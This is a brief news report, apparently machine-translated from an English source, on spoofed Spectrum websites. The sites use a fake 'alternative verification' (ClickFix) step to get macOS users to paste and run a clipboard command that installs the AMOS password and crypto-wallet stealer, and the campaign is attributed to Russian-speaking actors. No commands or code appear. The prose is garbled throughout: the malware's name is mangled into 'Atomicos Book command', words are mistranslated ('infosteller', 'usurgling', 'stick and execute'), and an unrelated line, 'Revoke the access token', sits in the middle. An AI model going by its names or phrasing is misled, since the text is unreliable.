- Cloudsek researchers find a spoofed version of the Spectrum Web website
- The site encourages people to execute Amos via the clickfix method
- The researchers attributed the attack to a Russian -speaking group
Russian threat actors were seen using the popular clickfix method to steal passwords and deposit malicious software infection on macOS targets.
Cloudsek safety researchers have reported several Spoofing Spectrum websites, a telecommunications supplier based in the United States. The victims visiting these websites would first be invited to verify that they are human – however, “verification” was designed to “fail”, after which the victims would be invited to use “alternative verification”.
We do not know why the attackers added the additional step – we can assume that it is to discourage the victims and lower them.
Revoke the access token
In all cases, the “alternative verification” method copies an order on their clipboard, after which the victims are invited to stick and execute them on their devices.
The Atomicos Book command (Amos) – an infamous infosteller macOS which enters passwords, cryptocurrency portfolio data and system information, macOS users.
Cloudsek did not attribute the campaign to a particular threat actor, but he determined that they are of Russian origin.
“By inspecting the source code of the delivery page, we met some comments in Russian, indicating that malware is probably distributed by Russian -speaking cybercriminals,” said the company.
It does not seem that the campaign has targeted a specific group of people or businesses, but as it usurgling, it is sure to say that the victims are current or potential customers of the company.
Experts noted that the campaign has been put in place rather awkwardly: “Logic poorly implemented in the delivery sites, such as incompatible instructions on platforms, indicates a haste infrastructure.
Clickfix has become very popular lately, with different security outfits reporting a cutting of different variants of the wild technique.
Via The Hacker News
